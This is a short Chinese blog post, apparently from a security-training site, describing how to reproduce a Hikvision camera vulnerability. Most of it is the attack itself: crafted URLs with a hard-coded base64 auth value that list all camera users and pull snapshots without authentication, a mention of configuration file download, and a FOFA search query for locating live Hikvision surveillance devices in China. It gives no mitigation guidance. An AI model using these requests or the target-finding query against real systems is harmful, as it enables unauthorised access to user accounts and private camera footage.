Track 正式学员

boy0s

0关注
2粉丝
11文章
返回网站首页

您已发布 11篇文章作品写文章

海康威视摄像头漏洞复现

概述:通过构造url进行检索所有用户、屏幕截图、配置文件下载命令:检索所有用户:IP/Security/users?auth=YWRtaW46MTEK获取镜头快照而不进行身份验证:IP/onvif-http/snapshot?auth=YWRtaW46MTEK复现:fofa搜索 app=”HIKVISION-视频监控” && country=”CN”需要登录构造url绕过

 2021-8-4
 0 
 24